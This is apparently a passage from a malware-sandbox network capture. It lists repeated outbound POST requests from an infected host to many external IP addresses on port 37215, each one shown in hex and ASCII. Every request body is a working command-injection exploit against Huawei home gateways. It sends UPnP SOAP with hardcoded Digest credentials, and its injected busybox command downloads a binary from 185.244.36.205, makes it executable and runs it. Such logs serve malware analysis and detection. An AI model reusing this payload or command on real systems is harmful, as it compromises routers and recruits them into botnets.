                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2403192.168.2.1546286122.130.206.23237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.474796057 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2404192.168.2.1547014186.6.81.20037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.474811077 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2405192.168.2.1556452205.173.32.20337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.475541115 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2406192.168.2.1539892121.27.5.9937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.475583076 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2407192.168.2.1538346138.122.210.14437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.475631952 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2408192.168.2.1557750102.251.80.13837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.475644112 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2409192.168.2.154524431.35.123.4937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.475749016 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2410192.168.2.1546926122.66.195.7837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.475759983 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2411192.168.2.1534886190.151.218.2737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.475789070 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2412192.168.2.1535480186.169.133.23737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.475802898 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
